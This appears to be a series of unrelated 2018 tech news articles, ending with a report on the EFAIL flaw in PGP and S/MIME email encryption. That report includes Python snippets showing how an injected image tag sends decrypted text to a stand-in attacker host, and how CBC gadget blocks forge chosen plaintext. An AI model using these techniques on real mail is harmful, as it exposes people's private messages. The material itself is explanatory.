Disposable plastic straws are a huge polluter. This keychain could change that
Every single day, Americans throw away an estimated 500 million single-use plastic straws, many of which wind up in landfills or the ocean without being recycled. A handy new portable implement aims to do something about that — and in a way that’s as stylish as it is eco-friendly. Called FinalStraw, it’s a keychain that transforms into a washable, reusable stainless steel straw.
“In 2013, I was in Thailand and noticed that the beach was covered in straws,” co-creator Emma Cohen told Digital Trends. “I’d pick them up every morning, and by the next morning there would be a fresh batch from people who’d ordered drinks and carelessly discarded the straws on the pristine beach. Once you’re aware of how much of the trash in the world is made up of single-use straws, you start to notice them everywhere you look. My obsession led me to do a TEDx talk on plastic straws in 2015. Then in October 2017, I was introduced to Miles Pepper, who had a brilliant idea for a travel-friendly reusable straw. I was still working in the pollution prevention division of Los Alamos National Laboratory, in New Mexico, but I was ready for a change. I left my job and started working with Miles on the project full time.”
The project has now arrived on Kickstarter, offering customers the opportunity to get their hands (and, presumably, mouth) on the steel straw.
“FinalStraw is great for anyone who wants to reduce their plastic waste and still suck,” Pepper told us. “Lots of people have reusable water bottles, but up until now, reusable straws were too big and bulky to carry around all of the time. FinalStraw solves these problems. [Plus], whipping this sucker out is a pretty cool party trick!”
As ever, we offer warnings about the risks of pledging money as part of crowdfunding campaigns. However, if you still wish to go ahead, you can head over to FinalStraw’s Kickstarter page for more information. There are just a few days to get involved, though, so you’ll have to be quick. Prices start at $20, with an estimated shipping date set for November 2018. Despite asking for a relatively meager $12,500, the project is currently sitting at around the $1.5 million mark. Converted into orders, that may be a bit shy of the daily 500 million plastic straws mark, but it’s not a bad start.
Need a nudge? Gmail’s new email reminder system goes live
If you’re a Gmail user, Google is taking away your excuse of “forgetting” to respond to important emails. Alongside the redesigned Gmail webmail interface that was announced a few weeks ago, Google is now rolling out a new feature called Nudge, which makes use of artificial intelligence to remind you to respond to emails.
“When your inbox is flooded with emails, some will inevitably slip through the cracks,” Google said of the new feature in a blog post. “Luckily, the new Gmail can help. It will now ‘nudge’ users to reply to emails they may have missed and to follow up on emails for which they haven’t received a response.”
What is Nudge, and how does it work?
Nudge identifies important emails in your inbox, tells you how many days ago each was sent, and asks if you want to reply, helping you stay productive. For the feature to work, Google uses an artificial intelligence engine to scan your emails. In the past, Google scanned your emails to serve up more personalized ads, but that practice ended last June.
Google still scans your emails today, but it does so for other purposes. By using A.I., Google is able to offer features like Smart Reply, Nudge, and high-priority notifications.
Another way that Google is using A.I. to scan your inbox is to stop spam and scam emails. So while you can turn off features like Nudge and Smart Reply, you cannot disable the scanning entirely, because Google uses these scans for security, to prevent scam emails from reaching you.
How to get ‘nudged’ on important emails
By default, Nudge is enabled for all Gmail and G Suite users. Google isn’t enabling the feature for all users at the same time, so it may take a few days for Nudge to show up in your Gmail. A requirement, however, is that you must have the new Gmail interface enabled. If you haven’t already done this, you can follow our guide on how to get the new Gmail right now.
Image: Google
Here’s how to spot a nudge
Nudges appear alongside your email previews on the right-hand side. You’ll see the sender’s name, the subject, and a preview of your email in black text. On the right of the preview on select emails is the nudge, which is shown in orange text to help draw your attention. Nudges will appear at the top of your inbox, so you’ll see them first.
The nudge shows when the email was received and asks if you want to respond to it right now. In one example, Gmail nudges on an email received three days ago. By displaying when each email was received, Gmail lets you focus first on the emails you’ve put off longest.
Nudges won’t appear for all emails in your inbox — that would defeat the purpose. Thanks to Google’s use of A.I. scans, Gmail will only nudge you on emails that its artificial intelligence algorithms deem important. As the A.I. learns, Gmail should get better at nudging you based on what’s truly important.
Nudges are flagged in two different ways. First, Google will nudge you about emails that you may have forgotten to reply to. This, hopefully, should keep the communication flowing. Second, a nudge can also suggest emails to follow up on.
An alternative to annoying nudges
Even though nudging is enabled by default, you can disable the feature by going into your Gmail settings. Turning off Nudge won’t turn off Google’s A.I. scan of your inbox, but you won’t see the orange text asking you to respond to emails that Google thinks are important.
Image: Google
After you’ve logged in, go to the Settings cog on the top right side, and click Settings. You’ll be able to enable or disable nudges by toggling the Suggest emails to reply to box or the Suggest emails to follow up on box.
If you prefer to manage your own nudges, you can also utilize Gmail’s Snooze feature.
Hover over your email preview within Gmail. You’ll see additional options to the right of the email preview.
On the right, you’ll see a clock, which is the Snooze feature. Click on the Clock to see a drop-down with options.
You can have Google remind you to go back to an email based on presets, like later today, tomorrow, later this week, this weekend, next week, or someday. Alternatively, you can click on Pick date and time to enter your own custom time for the reminder.
Join Android Central on Twitter this Wednesday for a OnePlus 6 AMA!
I would do anything for AMA, but I won’t do that.

AMA. It’s the kind of cultural phenomenon that could have only come from Reddit, but the term is now part of popular culture, and that’s fine. Heck, we’re happy about it.
See, for the launch of the OnePlus 6 this Wednesday, May 16 at 10AM PT / 1PM ET / 5PM BST, we’re doing something a bit different. We’re going to do a live Twitter AMA (it stands for Ask Me Anything, if you didn’t already know) after the announcement, answering all of your questions about the new phone.
We’ll have our video editor, Alex Dobie, on-site in London for the event, and I (that’s Managing Editor, Daniel Bader) will be remote alongside MrMobile himself, Michael Fisher, to answer any and all questions you might have. (We’re not going to say we’ve seen the phone, but we may have a bit of info that you don’t 😉.)
How do you get involved? Send your questions to the @androidcentral Twitter account with the hashtag #ACOnePlus6AMA. You have to use the hashtag (and tweet @androidcentral), otherwise we won’t see it. Here’s a sample question:
Hey @androidcentral, what does it feel like to #neversettle? #ACOnePlus6AMA
We’ll be doing some cool stuff during the AMA, with some specific shout-outs and perhaps a giveaway or two! The AMA kicks off as soon as the announcement ends, so between 1:30PM and 2PM ET. Submit your questions early so we’ll have a chance to respond!
Are you going to join us?
iPhone X Camera Compared to LG G7 ThinQ Camera
LG recently released its latest flagship smartphone, the LG G7 ThinQ, which, like flagship smartphones from many other manufacturers, includes a high-quality dual-lens camera that enables impressive photographic capabilities.
In our latest YouTube video, we pitted the G7’s camera against the camera of the iPhone X to compare and contrast the feature set and image quality of the two devices.
While the iPhone X has a dual-lens setup that includes a wide-angle and a telephoto lens, the G7, like the G6, takes a different approach for its camera setup, pairing a standard ~71-degree f/1.6 wide-angle lens with an even wider 107-degree f/1.9 lens, eschewing telephoto capabilities altogether.
Both sensors offer an improved 16-megapixel resolution, and the standard lens includes support for optical image stabilization and an autofocus system with both phase detection and laser assistance.
Apple’s iPhone X has a standard 12-megapixel f/1.8 wide-angle lens paired with a 12-megapixel f/2.4 telephoto lens, which is what Apple uses for its Portrait Mode depth effects. Both wide-angle and telephoto lenses have their purposes, and with LG’s setup, you can take wider landscape shots that fit more of the background in rather than closer portrait images designed to focus on a single subject.
LG’s device also includes a portrait mode-style effect, but the background blurring is done entirely via software rather than through lens technology. LG has included a unique “AI Cam” feature that’s designed to analyze the subjects in the photo and offer up recommendations on how to make adjustments for the best possible photo.
The native camera app on the LG G7 has an option for manual operation and several included photographic modes, while taking manual shots on the iPhone X requires you to download a third-party app.
We’ve got some comparison shots of the two cameras below, along with an Imgur album with all of the images featured in the video at a higher resolution:




The LG G7 and the iPhone X are both capable devices that take high-quality photos, so you won’t go wrong with either one of these smartphones.
We largely preferred the look of the iPhone X photos because of its tendency to capture more natural colors and to handle scenes with a lot of lighting variation without overexposing parts of the image, but in many cases, the camera you like best will come down to personal taste.
What do you think of the LG G7’s camera? Let us know in the comments.
Grasshopper lets you learn beginner code through gaming (review)
Coding seems to be all the rage nowadays. Seemingly limitless articles explain why coding is becoming the new must-have skill, and how not knowing at least a little code is going to severely limit your future job prospects.
But where to start? There are so many computer languages to learn, and so many ways to go about learning them.
Believe it or not (more than likely believe it), Google wants to help you get a taste of coding, but in a more “non-coding” environment. Instead of a blank command line staring at you, goading you into creating a bug-filled script, Google wants to provide your first taste of coding in the form of, wait for it… a mobile game.
So Google has brought us Grasshopper, an Android game whose sole intent is to teach you basic coding through a multi-level game format.

So many levels to master.

Try your hand at coding!
Grasshopper has been in beta for a while, and was just recently released by Google into the Play Store. Grasshopper helps you learn the basics of JavaScript, a primary language used by websites all over the world.
A product of Google’s “Area 120,” where employees are encouraged to devote 20% of their time to side projects they deem valuable and potential products, Grasshopper takes you on a puzzle-style game adventure, routing you through a very beginner-level introduction to terms and layout, then progressing into more and more challenging topics and coding scenarios.
Gameplay
To enjoy Grasshopper, first download the app from the Play Store. Once in the app, you can go through an ultra-short mini-course titled “What is Code?” Then you dive straight into learning JavaScript through a sequential series of coding puzzles, broken into units.
Google spends the first couple of puzzles in each unit teaching you a principle or tactic within JavaScript, with an easier puzzle to solve. Then you are given one or two additional puzzles to solve on your own.
If you ever get stuck, the game gives you quick access to a forum. Here you can investigate others’ troubles and solutions to the puzzle at hand.

Increasing difficulty….

Finishing a puzzle.

Completed unit!
When you complete the unit’s series of coding puzzles, you then have one or two quiz-level puzzles to tackle. Once you show your ability by solving these, you take your newfound expertise to the next unit. From here you build on it with the next topic or principle.
Visuals & Sound
The look and sound of Grasshopper, while built on a unique palette of earthy blues and greens, still have a Google-esque feel. The type and backgrounds are very clean and clear, and the limited animations are cute almost to the point of goofy.
Sound and audio are minimal to nonexistent. But I actually liked this, since coding is a pretty solitary and quiet endeavor. The silence also (I believe) helps with concentration during a particularly challenging puzzle.
What We Didn’t Like
If there is a gripe with Grasshopper, it’s that using it on a phone leaves the visible code a bit hard to follow. On a computer, code is strung out in long lines, as intended, and reading it left-to-right is a pretty natural affair.
On a phone or similar small-screen Android device, it’s a different story. The locked portrait orientation breaks some code across multiple lines. Arrays and other character combinations get split across two or more horizontal lines, and the resulting orphaned brackets, parentheses, and alphanumeric strings can make comprehending certain code particularly challenging. A landscape orientation, if it were available, would alleviate a lot of this frustration.
Overall
Grasshopper is generally a very good introduction for total beginners of all ages to the world of coding and JavaScript. Google has done a great job of making coding very approachable. The visuals are easy on the eyes, and there are plenty of chances and ways to master any given topic. If you have an itch to try out coding, or if your kiddo would like to try it out, Grasshopper is a highly recommended option.
Download Grasshopper from the Play Store here.
Doom Creator John Carmack Shares His Interactions With Steve Jobs
John Carmack, best known for his work on iconic games that include Quake, Doom, and Wolfenstein 3D, today took to Facebook to share details on his interactions with Steve Jobs and to provide some insight into Jobs’ opinion on gaming, what it was like working with Jobs, and what it felt like to participate in one of Jobs’ famous keynotes.
Carmack first interacted with Jobs when Jobs was still at NeXT, because Carmack wanted to add a “Developed on NeXT computers” logo to the original Doom game. His request was initially denied, but Jobs later changed his mind. Doom never included a “made on NeXT” label, but Carmack did go on to work with Jobs on other projects.
Jobs, said Carmack, didn’t appear to “think very highly of games” and seemed to wish “they weren’t as important to his platforms as they turned out to be.” Carmack was asked to discuss gaming requirements with Apple, and ended up having “a lot of arguments” with Jobs over the adoption of OpenGL. Jobs was good at talking with “complete confidence” about things he was “just plain wrong about.”
Part of his method, at least with me, was to deride contemporary options and dare me to tell him differently. They might be pragmatic, but couldn’t actually be good.
“I have Pixar. We will make something [an API] that is actually good.” It was often frustrating, because he could talk, with complete confidence, about things he was just plain wrong about, like the price of memory for video cards and the amount of system bandwidth exploitable by the AltiVec extensions.
Carmack did convince Apple to adopt OpenGL, something Carmack says was “one of the biggest indirect impacts” on the PC industry that he’s had, and he ended up doing several keynotes with Jobs. According to Carmack, keynotes were always a “crazy fire drill with not enough time to do things right.”
At one point, Jobs asked Carmack to do a keynote that was scheduled on the day of his wedding, with Jobs going as far as asking Carmack to reschedule the event, which Carmack declined to do.
Carmack and Jobs’ relationship began to fall apart after the launch of the iPhone, over a disagreement about web apps. Carmack was advocating for native apps while Jobs preferred web apps, leading to a heated dispute that later escalated when Carmack’s comments were covered by the media.
People were backing away from us. If Steve was mad, Apple employees didn’t want him to associate the sight of them with the experience. Afterwards, one of the execs assured me that “Steve appreciates vigorous conversation”.
Still deeply disappointed about it, I made some comments that got picked up by the press. Steve didn’t appreciate that. The Steve Jobs “hero / sh**head” rollercoaster was real, and after riding high for a long time, I was now on the down side. Someone told me that Steve explicitly instructed them to not give me access to the early iPhone SDK when it finally was ready.
Carmack developed several now-defunct iOS games, the last of which was Rage for iOS, and while he had “allies” within Apple, he was “on the outs with Steve” and never again conversed with the Apple CEO.
Carmack’s full account of working with Steve Jobs, which can be found over on Facebook, is well worth reading for anyone interested in the history of Apple.
Curious what you’re missing when you blink? This new wearable records it
University of the Arts Bremen
A blink might only last around 0.3 to 0.4 seconds, but that’s still enough time for you to miss information, hence the phrase “blink and you’ll miss it.” Researchers from Germany’s University of the Arts Bremen have come up with a device to help solve that problem — and it’s either the best or weirdest wearable we’ve heard about in ages. (Probably a bit of both, to be honest!)
Called “Augenblick” (German for “blink of an eye”), the wearable device records every frame of footage that’s missed when a person momentarily closes his or her eyes. To do this, it measures muscle activity around the eye by way of an electromyography sensor attached to the temple. This sensor detects minuscule electrical changes under the skin and translates them into a detectable signal. Meanwhile, a camera records the point of view of the wearer. By combining both of these information sources, it’s possible to produce a video stream of all the moments missed by the wearer.
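As a rough sketch of how those two signals could be combined, blink detection and frame recovery might look like the following Python. All of the values here (sample rates, the activity threshold, the synthetic signal) are illustrative assumptions, not specifications of the Augenblick hardware:

```python
EMG_RATE = 100      # EMG samples per second (assumed)
FPS = 30            # camera frames per second (assumed)
THRESHOLD = 0.8     # normalized activity level counted as a blink (assumed)

def blink_intervals(emg_samples, rate=EMG_RATE, threshold=THRESHOLD):
    """Return (start_sec, end_sec) spans where EMG activity exceeds the threshold."""
    spans, start = [], None
    for i, level in enumerate(emg_samples):
        if level >= threshold and start is None:
            start = i / rate                      # blink begins
        elif level < threshold and start is not None:
            spans.append((start, i / rate))       # blink ends
            start = None
    if start is not None:                          # blink still open at end of data
        spans.append((start, len(emg_samples) / rate))
    return spans

def missed_frames(spans, fps=FPS):
    """Map blink time spans to the indices of camera frames the wearer missed."""
    frames = []
    for start, end in spans:
        frames.extend(range(int(start * fps), int(end * fps) + 1))
    return frames

# Synthetic signal: 0.1 s quiet, 0.3 s of blink activity, 0.1 s quiet.
emg = [0.1] * 10 + [0.9] * 30 + [0.1] * 10
spans = blink_intervals(emg)        # one blink from 0.1 s to 0.4 s
print(missed_frames(spans))         # camera frames 3 through 12
```

In practice the threshold would need per-wearer calibration, since EMG amplitude varies with electrode placement and skin condition.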
“What enabled us to create a device like Augenblick in the first place was the rapid advancement in development boards like the Arduino and Raspberry Pi,” René Henrich, one of the project creators, told Digital Trends. “These devices have gotten smaller to the point that they are suitable for the development of wearable technology. This creates opportunities to build devices that were incredibly hard or even impossible for the average person to develop before.”
University of the Arts Bremen
Manasse Pinsuwan, Henrich’s collaborator, explained that the project is intended more as a proof of concept than a finished product.
“The idea of Augenblick is to explore a new form of visual processing,” Pinsuwan said. “We see a lot of potential for further technical and conceptual applications. We are eager to try new sensors and cameras to improve the current version and broaden the approach of unconscious recording measures to other potential triggers such as yawning, laughing, or your own heartbeat. To us, Augenblick also poses highly philosophical questions about the understanding of one’s own reality and a kid’s curiosity [concerning] whether the light in the fridge would still be on once the door is closed.”
Pinsuwan noted that Augenblick still has a long way to go in order to be feasible for the average consumer. Size, ease of use, and reliability are all factors that need to be improved. Still, once that’s sorted, we may be able to finally start to claw back those several years of our lives (based on an average of five blinks a minute for 18 hours a day) we waste over the course of an average life span.
How to change Google Assistant’s voice on your Android or Apple phone
If you’re using Google’s new routines, then the Google Assistant might be one of the most common voices in your day-to-day life. You wouldn’t be alone in that — with support for more than 5,000 smart devices, and the most intelligence of any smart assistant, Google is working hard to make Google Assistant a natural part of everyone’s life. But hearing the same voice every day can get tiring. Your Google Assistant is personalized to your specific tastes, so why can’t it sound different from everyone else’s?
Well, while a truly personal Google Assistant voice might be a little far-fetched, even in this age of rapidly advancing tech, you do have options when it comes to your Google Assistant’s voice. At Google I/O, it was unveiled that six new voices were coming to Google Assistant, bringing the total number of voice options to eight.
These voices were made possible by new tech that generates raw audio to simulate voices, rather than stitching together recorded snippets of human conversation — this means a more natural speech pattern, and fewer of the stuttered, unnatural voices you might be used to from other virtual assistants. The option to change the Google Assistant’s voice is currently only available in the U.S., but keep an eye out for this changing in the future, as Google does like to update Assistant quite often.
So how can you pick one of these new voices for your Google Assistant on your Google Home, iOS, or Android device? Check out our easy guide.
Changing Assistant’s voice on Android devices
Since Google Assistant is baked into most Android phones, changing the Assistant’s voice is pretty simple.
To get started, activate your Google Assistant by holding the home button on your phone, or by saying “Okay Google.” When your Assistant overlay pops up, tap the blue icon in the top-right corner of the overlay to access your main Assistant feed. Then hit the three dots in the top-right corner, and select Settings > Preferences > Assistant voice.
All you need to do from there is select which of the voices you like, and tap to change it. Changing is quick and easy, so there’s no need to worry if you need to change it back again. Even-numbered voices are male, and odd-numbered voices are female.
Changing Assistant’s voice on iOS devices
Changing the Google Assistant’s voice is just as easy on iOS devices, despite it not being the go-to voice assistant for many iPhone and iPad users.
Getting started is much the same as on an Android device. Open up your Google Assistant by opening the Assistant app from your home screen. Then hit the blue icon in the top-right of the screen, followed by the three dots button on the top right, then tap Settings > Preferences > Assistant voice. Then browse your selection of voices and choose the one that suits you best.
Changing Assistant’s voice on Google Home/smart speakers
When you change the voice on your phone app, your Google Home speaker will automatically start using it. It will even swap the voice for each account connected to the speaker.
Look ma, no wires! Google and Levi’s smart jean jacket is finally here
Why have a wearable on your wrist when you can have it all over your torso? Two years after first teasing us with their line of connected clothing, Google and Levi’s have delivered. The first piece to come out of Project Jacquard is the Commuter Trucker jacket, and you’ll have to pay $350 for the garment.
The key to the Commuter is the fabric of the jacket’s left sleeve. While technically powered by a rechargeable tag found on the inside of the sleeve, the very material of the jacket is itself smart. It’s made of a conductive yarn that could theoretically be woven into any fabric and, as a result, into any sort of clothing. From there, you could just touch your clothing as you would a touchscreen in order to activate certain functions, like playing music.
At launch, Google said it was still working to figure out how third-party developers could contribute to the platform, so the jacket only controlled the core functionality of your smartphone. Now, however, that seems to be changing — it has been announced that you’ll be able to connect either Lyft or Uber to the platform, so you can quickly and easily order a ride. After you request a ride, the snap tag will light up and vibrate to notify you when your ride has arrived. Bose has also stepped in to offer some functionality in the jacket — users will be able to assign any gesture to toggle noise canceling on their QuietComfort 30 or QuietComfort 35 headphones.
“It was a long road, but what’s really impressive is that the entire journey, we stayed true to our vision and what we wanted to achieve,” Ivan Poupyrev, project lead for Project Jacquard at Google, told Mashable. “This jacket is going to be sold as a piece of apparel. That was always the vision from the very beginning.”
Not only is it a good piece of clothing, but it also solves what Levi’s believes to be a significant need — a wearable that is functional and not dangerous.
“When you go to dinner and see your people at their meals looking at their screen, or when you see cyclists accessing their screens for navigation and putting themselves at risk … to me, that really was the reason to do it, ” said Paul Dillinger, Levi’s global product innovation head, at a SXSW discussion on connectivity.
We tested the jacket out for ourselves, and found it to be pretty helpful. Not only is it stylish, but it also adds a whole new layer of digital functionality — like the smartwatch did before it.
Updated on May 14, 2018: Uber, Lyft, and Bose functionality has been added to the Project Jacquard jacket.
Email encryption flaw gives hackers full access to your secret messages
Researchers at the Munster University of Applied Sciences discovered vulnerabilities in the Pretty Good Privacy (PGP) and S/MIME technologies used to encrypt email. The problem resides in how email clients use these plug-ins to decrypt HTML-based emails. Individuals and companies are encouraged to disable PGP and/or S/MIME in their email clients for now and use a separate application for message encryption.
Called EFAIL, the vulnerability abuses “active” content rendered within HTML-based emails, such as images, page styles, and other non-text content stored on a remote server. To successfully carry out an attack, the hacker must first have the encrypted email in their possession, whether through eavesdropping, hacking into an email server, or other means.
The first attack method is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. An attacker creates an HTML-based email comprising three parts: the start of an image request tag, the “stolen” PGP or S/MIME ciphertext, and the end of an image request tag. The attacker then sends this revised email to the victim.
On the victim’s end, the email client first decrypts the second part and then combines all three into one email. It then converts everything into a URL starting with the hacker’s address and sends a request to that URL to retrieve the nonexistent image. The hacker receives the image request, which contains the entire decrypted message.
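To make the mechanics concrete, here is a minimal Python sketch of that client-side concatenation. The attacker domain, the ciphertext blob, and the plaintext below are invented placeholders for illustration; the real proof of concept works inside MIME-parsing email clients, not a toy function:

```python
# Attacker splices the stolen ciphertext between the two halves of an
# <img> tag. Domain and message contents here are made-up placeholders.
part1 = '<img src="http://attacker.example/'
part2 = "hQEMA...placeholder-ciphertext..."   # "stolen" PGP/S-MIME blob
part3 = '">'

def vulnerable_render(p1, encrypted, p3, decrypt):
    # A vulnerable client decrypts the middle part, then concatenates all
    # three parts into a single HTML body before handing it to the renderer.
    return p1 + decrypt(encrypted) + p3

# Lambda stands in for the client's real PGP/S-MIME decryption step:
html = vulnerable_render(part1, part2, part3,
                         lambda _: "meet at the usual place")
print(html)
# <img src="http://attacker.example/meet at the usual place">
# Fetching that "image" URL delivers the plaintext to the attacker's server.
```

This is why the researchers recommend disabling remote content loading: if the client never fetches the image, the leaked URL never leaves the machine.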
The second method is called the “CBC/CFB Gadget Attack,” which resides within the PGP and S/MIME specifications, affecting all email clients. In this case, the attacker locates the first block of encrypted plaintext in the stolen email and adds a fake block filled with zeroes. The attacker then injects image tags into the encrypted plaintext, creating a single encrypted body part. When the victim’s client opens the message, the plaintext is exposed to the hacker.
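The gadget attack exploits only the structure of CBC decryption, where each plaintext block is D(C_i) XOR C_{i-1}: if you know the plaintext of one block (PGP and S/MIME messages begin with predictable headers), you can craft a preceding block that makes it decrypt to text of your choosing. The following sketch demonstrates that relation with a toy XOR block cipher standing in for AES (the attack never looks inside the cipher, so the relation is identical for any block cipher in CBC mode); the known header text and injected tag fragment are illustrative:

```python
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key = os.urandom(BLOCK)

# Toy invertible block cipher standing in for AES.
def E(block): return xor(block, key)
def D(block): return xor(block, key)

def cbc_decrypt(iv, blocks):
    prev, out = iv, []
    for c in blocks:
        out.append(xor(D(c), prev))   # P_i = D(C_i) XOR C_{i-1}
        prev = c
    return b"".join(out)

# Victim's ciphertext: the attacker knows the plaintext of the first block,
# e.g. a predictable content-type header (illustrative value here).
iv = os.urandom(BLOCK)
p0 = b"Content-type: te"              # known 16-byte plaintext block
c0 = E(xor(p0, iv))

# Gadget: craft a fake preceding block X so that (X, c0) decrypts to
# attacker-chosen bytes, such as the start of an image tag.
chosen = b'<img src="http:/'          # 16 bytes of injected HTML
x = xor(xor(iv, p0), chosen)
forged = cbc_decrypt(x, [c0])
assert forged == chosen               # chosen plaintext now appears in the email
```

Because the same relation holds for real AES-CBC, the long-term fix is authenticated encryption (and clients that actually reject messages with failed integrity checks), not a different block cipher.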
Ultimately, if you don’t use PGP or S/MIME for email encryption, then there’s nothing to worry about. But individuals, companies, and corporations who use these technologies on a daily basis are advised to disable related plugins and use a third-party client to encrypt emails, such as Signal (iOS, Android). And because EFAIL relies on HTML-based emails, disabling HTML rendering is also advised for now.
“This vulnerability might be used to decrypt the contents of encrypted emails sent in the past. Having used PGP since 1993, this sounds baaad (sic),” F-Secure’s Mikko Hypponen wrote in a tweet. He later said that people use encryption for a reason: Business secrets, confidential information, and more.
According to the researchers, “some” email client developers are already working on patches that either eliminate EFAIL altogether or make the exploits harder to accomplish. They say the PGP and S/MIME standards need an update, but that “will take some time.” The full technical paper can be read here.
The problem was first leaked by the Süddeutsche Zeitung newspaper prior to the scheduled news embargo. After the EFF contacted the researchers to confirm the vulnerabilities, the researchers were forced to release the technical paper prematurely.